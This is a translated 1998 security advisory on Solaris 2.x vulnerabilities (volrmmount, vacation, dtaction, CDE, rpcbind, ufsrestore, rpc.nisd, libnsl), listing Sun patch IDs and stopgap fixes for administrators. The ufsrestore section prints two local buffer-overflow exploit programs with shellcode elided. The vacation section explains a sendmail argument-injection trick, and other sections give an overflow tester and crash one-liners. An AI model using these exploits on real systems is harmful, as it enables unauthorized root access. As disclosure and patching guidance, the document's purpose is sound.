This document describes in detail the bugs in Solaris 2.x (2.3 to 2.6) that cause serious security problems, and presents remedies for them. Some of these bugs also affect SunOS 4.x, Solaris 2.0, Solaris 2.1 and Solaris 2.2, but discussion of those releases is omitted, since most SUN systems today run Solaris 2.3 to Solaris 2.6. Critical bugs that are shared with other operating systems are mentioned, however. The main reference for this document is the Sun Security Bulletin series; the discussions and bug descriptions that circulate on bugtraq and similar forums together with hacking scripts and programs have also been taken into account.
Because this document is based on the references above, it must be kept in mind that it does not cover every security bug that exists in Solaris 2.x. I believe it is important to diligently apply the patches that SUN continually provides.
It is a modest document, but I hope it is of help to administrators in Korea.
All rights to this article belong to its author, Huy Kang Kim (김휘강, sakai@major.kaist.ac.kr). Copying and distributing part or all of this article "without modification" is permitted as long as the author's copyright is "acknowledged" and it is not used for commercial purposes.
Bugs of Solaris 2.x in 1998
A list and discussion of the critical bugs in Solaris 2.x in 1998
Purpose:
Identify which Solaris 2.x bugs became hot issues in 1998, briefly analyze the cause of each problem, and look at how to patch it.

1. volrmmount (1998/2/10) ; bug id #162
1. volrmmount (1)
2. Affected systems: SunOS versions 5.6, 5.6_x86
3. Description of Bugs
volrmmount(1) is a command first shipped with Solaris 2.6.
It controls the insertion and ejection of removable media and, as with most programs that cause trouble, it is a setuid program owned by root.
The problem is of the same kind as those caused earlier by the vold and eject commands.
Through this program any ordinary user can access any file on the system, and can thereby also obtain root privileges.
4. Remedy & patch list
SunOS 5.6_x86 | ftp://sunsolve1.sun.com/pub/patches/105408-01.tar.Z
5. References

2. vacation (1998/3/4) ; bug id #163
1. vacation (1)
2. Affected systems:
3. Description of Bugs
vacation(1) automatically replies to new messages while the user cannot read mail (for instance while on vacation).
It is enabled by putting an entry like the following in $HOME/.forward:
\user, "|/usr/bin/vacation user"

When vacation answers a new message it invokes the sendmail command, with the sender's address given on the command line.
Because the sender's e-mail address is passed on the command line, a crafted e-mail address can smuggle in the option that tells sendmail which configuration file to read.
(Example: an address of -C/var/mail/user makes sendmail use /var/mail/user as its configuration file.)
The configuration file used for the attack is delivered in advance by e-mail message or anonymous ftp (in the example above the mail spool file /var/mail/user serves as sendmail's configuration file) and is crafted so that sendmail, when it runs, executes commands the attacker chose.
If the attack succeeds, sendmail executes the arbitrary commands named in that configuration file.

Note: this bug was discovered by Liudvikas Bukys in 1994.

4. Remedy & patch list
vacation, like autoreply, is a program that is not used very much.
Either apply the patch provided by the OS vendor, or disable it altogether with
# chmod 0 /usr/bin/vacation
If vacation really must be used, install a bug-fixed vacation in the meantime:
ftp://testcase.software.ibm.com/aix/fromibm/vacation.security.tar.Z
No patch exists yet.
The bug still exists in OpenBSD versions before 1997/08/29.
The problem has been fixed in 2.1-stable, 2.2-stable and 3.0-current (1997/08/28). It will also be fixed in the forthcoming FreeBSD 2.2.5-RELEASE and 3.0-RELEASE.
Upgrading to a version after 19970828 is recommended.

Patches are already provided for SunOS:
OS version | Patch ID
SunOS 5.6 | 105518-01
SunOS 5.6_x86 | 105519-01
SunOS 5.5.1 | 105520-01
SunOS 5.5.1_x86 | 105521-01
SunOS 5.5 | 105533-01
SunOS 5.5_x86 | 105534-01
SunOS 5.4 | 102066-21
SunOS 5.4_x86 | 102064-19
SunOS 5.3 | 101782-02
SunOS 4.1.4 | 105466-01*
SunOS 4.1.3_U1 | 105465-01*
The patches above work only with sendmail V8, so sites still running sendmail V5 should upgrade to V8.
Fetch the patched vacation from the ftp site below and install it:
ftp://ftp.secnet.com/pub/patches/vacation.tar.Z
The patch above was written by Eric Allman and Keith Bostic. It has not been confirmed that sendmail versions other than version 8 emulate getopt() well enough to interpret the "--" option correctly, and a sendmail that does not use getopt() cannot parse a "--" on its command line. If you want to apply this patch with an earlier sendmail, the following line in vacation.c
execl(_PATH_SENDMAIL, "sendmail", "-f", myname, from, NULL);
must be changed to:
execl(_PATH_SENDMAIL, "sendmail", "-f", myname, "--", from, NULL);

5. References

3. dtaction (1998/3/4) ; bug id #164
1. dtaction
2. Affected systems: SunOS versions 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86 running CDE
3. Description of Bugs
The dtaction utility lets an application or shell script be invoked when an action request arrives in the CDE (Common Desktop Environment). It normally lives in /usr/dt/bin/.
dtaction performs no bounds checking on its arguments, so an overlong argument overflows a stack buffer and overwrites the stack. As the listing below shows, dtaction is setuid root, so it can be used to obtain root privileges.

[major /usr/dt/bin 47 ] ls -asl dtaction
44 -r-sr-sr-x 1 root sys 22516 1996년 4월 13일 dtaction*
The dtaction problem is fundamentally a consequence of the CDE and X library problems described in the following sections.
4. Remedy & patch list
CDE version | Patch ID
1.2 | 105669-02
1.2_x86 | 105670-02
1.02 | 105716-02
1.02_x86 | 105717-02
1.01 | 105714-02
1.01_x86 | 105715-02

4. CDE problems
In connection with dtaction, let us look at the problems that affect CDE as a whole.

1. Package: CDE (Common Desktop Environment)
2. Affected systems: only those installations of the OS versions concerned on which CDE is installed
3. Description of Bugs
The dtappgather program does not properly validate information supplied by the user. Exploiting this, an attacker can not only obtain root privileges on the system but also mount a denial of service attack.
More specifically, a local user can obtain write access to arbitrary files, which can be abused to gain root privileges (for example via ~root/.rhosts). Arbitrary directories can also be deleted, so important system directories can be removed to put the server out of service.

4. Remedy & patch list
A patch is currently under development and is due to appear on the patch site shortly.
The problem exists in all versions of AIX that include dtappgather.

5. X library problems
1. Package: X library
2. Affected systems: most UNIX systems
3. Description of Bugs
The problems below were pointed out by David Hedley.
The X library on most UNIX platforms has a flaw in its resource manager routines. Of particular concern are setuid programs linked against an X library that uses the X resource manager routines: even if the program itself has no security flaw, it can be made to overflow a buffer.

Let us test this. Compile the program below and run it with various setuid X Window programs as its parameter. If a segmentation fault or bus error results, the program can be regarded as potentially vulnerable.

testx.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    char *env[] = { NULL };          /* empty environment for the target */
    char buffer[18000];              /* Irix has a 20k limit for environment+args */
    if (argc < 2)
        exit(1);
    /* pass an 18 KB resource string via -xrm; a crash means the resource
       manager copied it into a fixed-size buffer */
    memset(buffer, 'a', sizeof buffer);
    buffer[sizeof buffer - 1] = '\0';
    execle(argv[1], argv[1], "-xrm", buffer, (char *)NULL, env);
    perror("exec failed");
    return 1;
}
% ./testx /usr/bin/X11/xterm
zsh: bus error ./testx /usr/bin/X11/xterm
% ./testx /usr/bin/X11/cdplayer
zsh: bus error ./testx /usr/bin/X11/cdplayer
% ./testx /usr/bin/X11/xconsole
zsh: bus error ./testx /usr/bin/X11/xconsole
% ./testx /usr/bin/X11/xlock
Xlib: connection to ":0.0" refused by server
Xlib: Client is not authorized to connect to Server
xlock: unable to open display :0.
In the run above xlock appeared to be unaffected, but the run below shows that it too is potentially vulnerable.

% ./testx /usr/dt/bin/dtprintinfo
zsh: bus error ./testx /usr/dt/bin/dtprintinfo
% ./testx /usr/dt/bin/dtaction
zsh: bus error ./testx /usr/dt/bin/dtaction
¡¡
%./testx /usr/X11R6/bin/xlock
zsh: segmentation fault ./testx /usr/X11R6/bin/xlock
%./testx /usr/X11R6/bin/color_xterm
zsh: segmentation fault ./testx /usr/X11R6/bin/color_xterm
%./testx /usr/X11R6/bin/xterm
zsh: segmentation fault ./testx /usr/X11R6/bin/xterm
For reference, the xlock used in the experiment is xlockmore-4.02, the latest version.

% uname -a
Linux xwing 2.0.0 #5 Fri Feb 21 13:01:20 PST 1997 i486
% testx /usr/X11/bin/xload
Segmentation fault
% testx /usr/X11/bin/xlock
Segmentation fault
% testx /usr/X11/bin/xterm
Segmentation fault

$ cat /etc/redhat-release
release 4.1 (Vanderbilt)
$ uname -a
Linux turing.imm.net 2.0.30 #3 Sat Apr 26 22:55:36 MET DST 1997 i686
$ find /usr/X11R6 -perm +6000 -exec ls -l {} \;
-rws--x--x 1 root root 144868 Feb 13 03:49 /usr/X11R6/bin/xterm
-rws--x--x 1 root root 159472 Nov 20 1996 /usr/X11R6/bin/kterm
-rwsr-xr-x 1 root bin 710284 Feb 19 07:54 /usr/X11R6/bin/Xmetro
-r-sr-xr-x 1 root root 10464 Dec 19 01:01 /usr/X11R6/bin/XConsole
-rwsr-xr-x 1 root root 53464 Jan 31 23:16 /usr/X11R6/bin/rxvt
-rwxr-sr-x 1 root uucp 98364 Nov 21 1996 /usr/X11R6/bin/seyon
-rwxr-sr-x 1 root daemon 181436 Nov 20 1996 /usr/X11R6/bin/xbill
-rws--x--x 1 root root 136504 Nov 20 1996 /usr/X11R6/bin/nxterm
-rwsr-xr-x 1 root bin 477408 Aug 16 1996 /usr/X11R6/lib/X11/AcceleratedX/arch/LINUX/Xaccel

$ ./testx /usr/X11R6/bin/xterm
Segmentation fault
$ ./testx /usr/X11R6/bin/kterm
^[[ASegmentation fault
$ ./testx /usr/X11R6/bin/XConsole
Segmentation fault
$ ./testx /usr/X11R6/bin/rxvt
rxvt: bad option "-xrm"
rxvt: bad option
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa$
[spam]
Usage v2.19:
rxvt [-help]
[-display displayname] [-geometry geom] [-/+rv] [-bg color] [-fg color]
[-fn fontname] [-iconic] [-name string] [-title string] [-n string]
[-cr color] [-/+ls] [-/+sb] [-sl number] [-/+ut] [-/+vb] [-C]
[-e command arg ...]

$ ./testx /usr/X11R6/bin/seyon
>> Warning: Could not execute `seyon-emu.
>> Notice: Falling to `xterm'.
>> Error: Could not execute `xterm'.
>> Notice: Giving up.
$ ./testx /usr/X11R6/bin/xbill
Segmentation fault
$ ./testx /usr/X11R6/bin/nxterm
Segmentation fault

4. Remedy & patch list
Obtain the buffer overflow wrapper developed by AUSCERT from the sites below and install it:
ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper/overflow_wrapper.c
http://cegt201.bradley.edu/~im14u2c/wrapper/
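As an added illustration of the wrapper approach (this is not AUSCERT's overflow_wrapper.c and not code from the article), the program below is a minimal setuid wrapper of the same kind: installed under the name of a setuid X program, with the original binary moved to the path in REAL_PROGRAM (a placeholder), it refuses to exec the real program when any argument or environment string is longer than MAX_ARG_LEN. The limit, the path and the function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>

/* Assumed limit: long enough for any legitimate -xrm resource, far
 * below the 18000-byte string testx.c passes. */
#define MAX_ARG_LEN 1024
/* Placeholder: where the original setuid binary was moved. */
#define REAL_PROGRAM "/usr/dt/bin/dtaction.real"

extern char **environ;

/* Return the index of the first string in a NULL-terminated vector
 * (argv or environ) longer than limit, or -1 if every string fits. */
int first_oversized(char *const *vec, size_t limit)
{
    for (int i = 0; vec[i] != NULL; i++)
        if (strlen(vec[i]) > limit)
            return i;
    return -1;
}

/* Decide whether it is safe to exec the real program.
 * Returns 0 if argv and envp are within limit, 1 for an oversized
 * argument, 2 for an oversized environment string. */
int wrapper_check(char *const *argv, char *const *envp, size_t limit)
{
    if (first_oversized(argv, limit) >= 0)
        return 1;
    if (first_oversized(envp, limit) >= 0)
        return 2;
    return 0;
}

int main(int argc, char **argv)
{
    (void)argc;
    int rc = wrapper_check(argv, environ, MAX_ARG_LEN);
    if (rc != 0) {
        /* log the refusal so an administrator can see overflow attempts */
        openlog("overflow_wrapper", LOG_PID, LOG_AUTH);
        syslog(LOG_WARNING, "refused %s: %s longer than %d bytes (uid %d)",
               REAL_PROGRAM, rc == 1 ? "argument" : "environment string",
               MAX_ARG_LEN, (int)getuid());
        closelog();
        fprintf(stderr, "%s: argument too long, not executing\n", argv[0]);
        return 1;
    }
    execv(REAL_PROGRAM, argv);   /* only reached when every string is within the limit */
    perror("execv");
    return 1;
}
```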
6. ndd (1998/3/11) ; bug id #165
1. ndd (1M)
2. Affected systems: SunOS 5.6, SunOS 5.6_x86
3. Description of Bugs
ndd is used to set TCP/IP kernel parameters. By abusing ndd, attackers can set those parameters at will and thereby mount a denial of service attack.

4. Remedy & patch list
OS Version | Patch ID
SunOS 5.6 | 105786-01
SunOS 5.6_x86 | 105787-01
5. References

7. rpc.cmsd (1998/3/11) ; bug id #166
1. rpc.cmsd
2. Affected systems:
3. Description of Bugs
rpc.cmsd is a small database manager used for calendar management and resource scheduling. Its clients include the OpenWindows Calendar Manager and the CDE calendar. A flaw in this program makes it possible to overwrite arbitrary files with arbitrary content, and thereby obtain root privileges.
4. Remedy & patch list
SunOS | Patch ID
SunOS 5.5.1 | 104976-03
SunOS 5.5.1_x86 | 105124-02
SunOS 5.5 | 103251-07
SunOS 5.5_x86 | 103273-04
SunOS 5.4 | 102030-09
SunOS 5.4_x86 | 102031-07
SunOS 5.3 | 101513-12
SunOS 4.1.4 | 100523-24
SunOS 4.1.3_U1 | 100523-24
CDE version | Patch ID
1.02 | 103670-04
1.02_x86 | 103717-04
1.01 | 103671-04
1.01_x86 | 103718-04

8. rpcbind (1998/4/8) ; bug id #167
1. rpcbind
2. Affected systems: SunOS versions 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3
3. Description of Bugs
rpcbind is the server that maps RPC program numbers to universal addresses. When an RPC service starts, it registers with rpcbind the address it is listening on and the RPC program number it is ready to serve. A flaw has been found in rpcbind that lets anyone overwrite arbitrary files and thereby gain access to the system.
Furthermore, according to Nicolas Dubee, when rpcbind is terminated by a SIGTERM or SIGINT signal it writes the list of currently registered services to /tmp/portmap.file and /tmp/rpcbind.file without any check for symbolic links or anything else. This can reportedly be abused to make it write to any file in the file system (for example .rhosts).
If rpcbind was started with the -d option, so that it runs in debug mode, and it receives a procedure call it cannot answer (that is, the client closes the connection before the response is sent), rpcbind_abort() is called before the process is killed, and rpcbind_abort() in turn calls write_warmstart(). write_warmstart() records the warm-start information in /tmp/rpcbind.file and /tmp/portmap.file. Note that this happens only when rpcbind was started in debug mode.
4. Remedy & patch list
OS version | Patch ID
SunOS 5.6 | 105216-03
SunOS 5.6_x86 | 105217-03
SunOS 5.5.1 | 104331-07
SunOS 5.5.1_x86 | 104332-07
SunOS 5.5 | 104357-05
SunOS 5.5_x86 | 104358-05
SunOS 5.4 | 102070-06
SunOS 5.4_x86 | 102071-06
SunOS 5.3 | 102034-05

Alternatively, obtain Wietse Venema's RPCBIND version 2.1 from the site below and install it:
ftp://ftp.win.tue.nl/pub/security
That program creates its files with the O_EXCL option, so it refuses to open a file that already exists.
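As an added example (not rpcbind's code, and not Wietse Venema's replacement), the program below contrasts the unchecked write that write_warmstart() performs into /tmp with a create that uses O_CREAT|O_EXCL, then replays the planted-symlink scenario in a private scratch directory. The function names and the scratch-directory layout are assumptions; the victim file and its contents are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Unsafe, the way the article describes rpcbind: open for writing with
 * no checks.  fopen() follows a symlink at path and truncates whatever
 * it points at.  Returns 0 on success. */
int write_state_unsafe(const char *path, const char *data)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fputs(data, f);
    return fclose(f);
}

/* Safe: only write a file we created ourselves.  O_EXCL makes open()
 * fail with EEXIST if anything (file, symlink, FIFO) is already at
 * path, and O_NOFOLLOW additionally refuses a symlink.  Returns 0 on
 * success, -1 with errno set otherwise. */
int write_state_safe(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;               /* errno == EEXIST when a link was planted */
    size_t len = strlen(data);
    int rc = (write(fd, data, len) == (ssize_t)len) ? 0 : -1;
    if (close(fd) != 0)
        rc = -1;
    return rc;
}

/* Replay the attack in a scratch directory: a symlink bearing the
 * daemon's state-file name points at a victim file (constructed here
 * with known contents); the daemon then writes its state through that
 * name.  Returns 1 if the victim was clobbered, 0 if it survived,
 * -1 on a setup error. */
int victim_clobbered(int use_safe)
{
    char dir[] = "/tmp/warmstartXXXXXX";
    char victim[64], link[64], buf[64] = {0};
    FILE *f;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(link, sizeof link, "%s/rpcbind.file", dir);

    if ((f = fopen(victim, "w")) == NULL)
        return -1;
    fputs("original contents\n", f);
    fclose(f);
    if (symlink(victim, link) != 0)
        return -1;

    if (use_safe)
        write_state_safe(link, "warmstart data\n");     /* fails with EEXIST */
    else
        write_state_unsafe(link, "warmstart data\n");   /* follows the link */

    if ((f = fopen(victim, "r")) == NULL)
        return -1;
    if (fgets(buf, sizeof buf, f) == NULL)
        buf[0] = '\0';
    fclose(f);
    unlink(link);
    unlink(victim);
    rmdir(dir);
    return strcmp(buf, "original contents\n") != 0;
}

int main(void)
{
    printf("unsafe write: victim clobbered = %d\n", victim_clobbered(0));   /* 1 */
    printf("O_EXCL write: victim clobbered = %d\n", victim_clobbered(1));   /* 0 */
    return 0;
}
```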

5. References

9. mountd (1998/4/29) ; bug id #168
1. rpc.mountd
2. Affected systems: SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3
3. Description of Bugs
mountd is the RPC server that handles NFS file system mount requests.
A bug in this program can be used to obtain information about files on the NFS server, even files that do not belong to a file system exported over NFS.

4. Remedy & patch list
SunOS | Patch ID
SunOS 5.6 | 105615-03
SunOS 5.6_x86 | 105616-03
SunOS 5.5.1 | 104220-03
SunOS 5.5.1_x86 | 104221-03
SunOS 5.5 | 104223-02
SunOS 5.5_x86 | 104224-02
SunOS 5.4 | 102685-02
SunOS 5.4_x86 | 102686-02
SunOS 5.3 | 102654-02

5. References

10. ufsrestore (1998/4/29) ; bug id #169
1. ufsrestore
2. Affected systems: SunOS 5.5, 5.5.1
3. Description of Bugs
The ufsrestore utility restores, from backup media, files that were written with the ufsdump command. A bug in ufsrestore lets any local user obtain root privileges.

(by Seth McGann)
That is, even where root is not obtained, the privileges of group tty can be.
The flaw can be tested as follows:
/usr/lib/fs/ufs/ufsdump 1 `perl -e 'print "a" x 2000'`
/usr/lib/fs/ufs/ufsrestore xf `perl -e 'print "a" x 2000'`
For reference, the program that exploits ufsdump is given below. Part of it has been removed to prevent misuse.

/* ufsdump.c
 * Description: Overflows a buffer to give you EGID=tty.
 * At least that's what id reports.
 * The running shell thinks its still the user. Maybe I'm
 * doing something wrong? At any
 * rate, here ya go, have fun.
 *
 * smm@wpi.edu
 * Thanks to: Jesse Schachter for the box, and
 * Unknown parties for the shellcode. (probably Aleph1).
 */

#include <stdio.h>
static inline getesp() {
    __asm__(" movl %esp,%eax ");
}
main(int argc, char **argv) {
    int i,j,buffer,offset;
    long unsigned esp;
    char unsigned buf[4096];
    unsigned char
    shellcode[]=
    ...
    buffer=895;
    offset=3500;
    if (argc>1)buffer=atoi(argv[1]);
    if (argc>2)offset=atoi(argv[2]);
    for (i=0;i<buffer;i++)
        buf[i]=0x41; /* inc ecx */
    j=0;
    for (i=buffer;i<buffer+strlen(shellcode);i++)
        buf[i]=shellcode[j++];
    esp=getesp()+offset;
    buf[i]=esp & 0xFF;
    buf[i+1]=(esp >> 8) & 0xFF;
    buf[i+2]=(esp >> 16) & 0xFF;
    buf[i+3]=(esp >> 24) & 0xFF;
    buf[i+4]=esp & 0xFF;
    buf[i+5]=(esp >> 8) & 0xFF;
    buf[i+6]=(esp >> 16) & 0xFF;
    buf[i+7]=(esp >> 24) & 0xFF;
    printf("Offset: 0x%x\n\n",esp);
    execl("/usr/lib/fs/ufs/ufsdump","ufsdump","1",buf,NULL);
}

The program that exploits ufsrestore is given below. Again, part of the code has been removed to prevent misuse.

// ufsrestore solaris 2.4, 2.5, 2.5.1, 2.6 exploit
// by humble
// thanks to plaguez for help

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH 300
#define EXTRA 100
#define STACK_OFFSET -600
#define SPARC_NOP 0xac15a16e

// normal shell code cept I added a bunch of sll's and add's
// to get rid of a 2f '/' in there (from the sethi 0xbdcda, %l7)
// I don't know sparc assembly so this might be dumb :P

// also added code to do seteuid(0); setuid(0); from erik's buffer
// overrun page

...
u_long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
    char buf[BUF_LENGTH + EXTRA + 8];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode),dso=0,a=0;

    if(argc > 1) dso=atoi(argv[1]);

    long_p =(u_long *) buf ;
    targ_addr = get_sp() - STACK_OFFSET - dso;
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = SPARC_NOP;

    char_p = (u_char *) long_p;

    for (i = 0; i < code_length; i++)
        *char_p++ = sparc_shellcode[i];

    long_p = (u_long *) char_p;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ =targ_addr;

    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
           targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
    printf("hit ctrl-c and then type y\n");
    execl("/usr/lib/fs/ufs/ufsrestore", &buf[4],"if", "-",(char *) 0);
    perror("execl failed");
}

4. Remedy & patch list
Patches 105722-01 and 105724-01 are still incomplete, so apply the following temporary fix:
chmod ug-s /usr/lib/fs/ufs/ufsdump
chmod u-s /usr/lib/fs/ufs/ufsrestore
The patches provided by the OS vendor are as follows.
SunOS | Patch ID
SunOS 5.5.1 | 104490-05
SunOS 5.5.1_x86 | 104491-04
SunOS 5.5 | 103261-06
SunOS 5.5_x86 | 103262-06

5. References

11. rpc.nisd (1998/6/10) ; bug id #170
1. rpc.nisd
2. Affected systems:
3. Description of Bugs
NIS+ and NIS were developed to make it convenient to manage users, machines and other network resources centrally in a distributed environment.
NIS+ contains a flaw that can cause a buffer overflow.
Normally, data sent to an RPC daemon has an explicit maximum length precisely so that it cannot overflow a buffer. The NIS+ argument nis_name, however, has no maximum length defined, so the length it can take is unsafe.
Because NIS+ copies this argument into a fixed-length buffer on the stack, an attacker can overflow the stack and make the daemon execute arbitrary machine code. This problem was discovered by Josh Daymont of ISS.

Moreover, if the NIS+ server is running in NIS compatibility mode and an intruder can compromise it, the intruder can pose as a NIS server and thereby gain access to the machines that use NIS.
Also, if an intruder can crash the NIS+ server, NIS+ clients can be fed incorrect initialization information.

To see whether your own Solaris host is exposed to the nisd flaw, check whether rpc.nisd is running:

solaris% rpcinfo -p localhost | grep 100300

Since the bug exists in most current Solaris versions, output like the following means the host must be patched:
100300 3 udp 32773 nisd
100300 3 tcp 32771 nisd

The rpc.nisd daemon is the RPC service that implements the NIS+ service; it must be running on every machine that belongs to the NIS+ namespace.
By triggering a buffer overflow in rpc.nisd, arbitrary commands can be executed and root privileges obtained.

First, let us look at NIS+ in a little more detail.
NIS+ is a kind of network directory service that provides resource location and management by means of name resolution and authentication. It can be regarded as the successor of NIS, better known as YP.
NIS+ uses the ONC RPC mechanism: NIS+ clients interact with the server over RPC.
Because the services NIS+ provides are security-critical, NIS+ was designed to operate securely, and the notion of "security levels" is the clearest expression of that design.
A security level sets how rigorously NIS RPC requests are verified.

NIS+ has three security levels, 0 to 2.
At level 0, the NIS+ server (rpc.nisd) performs no authentication at all of the legitimacy of incoming requests. This option exists for debugging.
At level 1, RPC AUTH_UNIX (client-presented UIDs and GIDs) is the authentication method.
At level 2, the most secure, AUTH_DES is used to authenticate incoming requests. However, even when a system runs at security level 2, where every request should pass cryptographic authentication, the rpc.nisd daemon services a few RPC calls without authentication, and those calls let a remote client obtain important information about the NIS+ server.

Worse, a remote intruder can also disable the NIS+ server's logging and make it flush its NIS+ caches. This is caused by a bug in rpc.nisd, the NIS+ daemon.
The three problematic RPC calls are as follows.
1. NIS_CALLBACK
Using the NIS_CALLBACK RPC, any client can determine whether a given PID is valid or, with multiple queries, enumerate every valid process ID.
2. NIS_STATUS
Using the NIS_STATUS RPC, clients can obtain information about the NIS+ server's configuration.
3. NIS_SERVSTATE
Using this RPC's TAG_DEBUG option, any outside user can stop all rpc.nisd logging. Using the TAG_*CACHE (D, T, G) options, the directory, table and group caches can be flushed.

4. Remedy & patch list
It is recommended not to use NIS+ until the patch has been applied. Where NIS+ must be used, be sure to apply the patch; where that is not possible, the following can serve as a stopgap.
A patch is under development.
Obtain the patch from the site below.
ftp://ftp.meshnet.or.jp/pub/48pub/security
SunOS | Patch ID
SunOS 5.6 | 105401-13
SunOS 5.6_x86 | 105402-13
SunOS 5.5.1 | 103612-41
SunOS 5.5.1_x86 | 103613-41
SunOS 5.5 | 103187-38
SunOS 5.5_x86 | 103188-38
SunOS 5.4 | 101973-35
SunOS 5.4_x86 | 101974-35
SunOS 5.3 | 101318-91 (to be released in 12 weeks)

12. ftpd (1998/6/10) ; bug id #171
1. ftpd
2. Affected systems: SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86 and 5.3
3. Description of Bugs
in.ftpd is the FTP (File Transfer Protocol) server process. It is started by inetd each time a connection is made to the ftp service. A problem has been reported whereby in.ftpd can be abused to mount a denial of service attack against the ftp server.
4. Remedy & patch list
SunOS | Patch ID
SunOS 5.6 | 106301-01
SunOS 5.6_x86 | 106302-01
SunOS 5.5.1 | 103603-08
SunOS 5.5.1_x86 | 103604-08
SunOS 5.5 | 103577-08
SunOS 5.5_x86 | 103578-08
SunOS 5.4 | 101945-59 (to be released in 6 weeks)
SunOS 5.4_x86 | 101946-52 (to be released in 6 weeks)
SunOS 5.3 | 104938-02

5. References

13. libnsl ; Sun Security Bulletin #172
1. libnsl
2. Affected systems: SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3
3. Description of Bugs
The network services library libnsl provides the functions that application programs use as their interface to network services. It was found that buffer overflows can occur in routines inside this library and can be exploited to obtain root privileges. The following is based on RSI advisory #5; the vulnerabilities were discovered by Matt Conover.
List of vulnerable functions
Vulnerable key functions | Notes
extract_secret( ) | buffer overflow possible when copying data into a local buffer
getkeys_nis( ) | buffer overflow possible when the key value is larger than the buffer
getpublickey( ) | calls getkeys_nis( )
getsecretkey( ) | calls getkeys_nis( )

Vulnerable RPC functions | Notes
authdes_seccreate( ) | calls getpublickey( )
rpc_broadcast_exp( ) | buffer overflow possible when a network protocol type is specified
rpc_broadcast( ) | calls rpc_broadcast_exp( )
clnt_create_timed( ) | buffer overflow possible when a network protocol type is specified
host2netname( ) | buffer overflow possible when a hostname is specified
getnetname( ) | calls host2netname( )
clnt_create( ) | calls clnt_create_timed( )
rpc_call( ) | buffer overflow possible when a network protocol type is specified
authdes_pk_seccreate( ) | calls getnetname( )

Vulnerable NIS functions | Notes
__nis_init_callback( ) | calls getpublickey( )
__nis_core_lookup( ) | buffer overflow possible when copying parameters into a local buffer
nis_make_rpchandle( ) | calls host2netname( )
nis_dump_r( ) | calls nis_make_rpchandle( )
nis_dump( ) | calls nis_dump_r( )
__nis_auth2princ( ) | buffer overflow possible when a machine name is specified
__nis_host2nis_server( ) | buffer overflow possible when a hostname is specified
nis_name_of_r( ) | buffer overflow possible when copying parameters into a local buffer
nis_old_data_r( ) | buffer overflow possible when copying parameters into a local buffer
nis_list( ) | calls __nis_core_lookup( )
nis_add( ) | calls nis_nameops( )
nis_remove( ) | calls nis_nameops( )
nis_modify( ) | calls nis_nameops( )
nis_mkdir( ) | calls nis_make_rpchandle( )
nis_rmdir( ) | calls nis_make_rpchandle( )

Potentially vulnerable programs:
programs that call the vulnerable RPC functions
programs that call the vulnerable key functions
programs that call the vulnerable NIS functions
programs that call the vulnerable YP functions
4. Remedy & patch list
SunOS | Patch ID
SunOS 5.6 | 105401-14
SunOS 5.6_x86 | 105402-14
SunOS 5.5.1 | 103612-43
SunOS 5.5.1_x86 | 103613-43
SunOS 5.5 | 103187-39
SunOS 5.5_x86 | 103188-39
SunOS 5.4 | 101973-36
SunOS 5.4_x86 | 101974-36
SunOS 5.3 | 101318-91 (to be released within 8 weeks)
5. References
http://sunsolve1.sun.com/pub-cgi/us/sec2html?secbull/172
14. SUNWadmap ; Sun Security Bulletin #173
1. SUNWadmap
2. Affected systems: SunOS 5.6, 5.6_x86
3. Description of Bugs
SUNWadmap is the system administration applications package. The SUNWadmap package shipped with the Solaris 2.6 Hardware: 3/98 and 5/98 updates contains a bug through which an intruder can obtain root privileges.
4. Remedy & patch list
SunOS | Patch ID
SunOS 5.6 | 105800-02 (requires patch 106125-05)
SunOS 5.6_x86 | 105801-02 (requires patch 106126-05)
5. References
http://sunsolve1.sun.com/pub-cgi/us/sec2html?secbull/173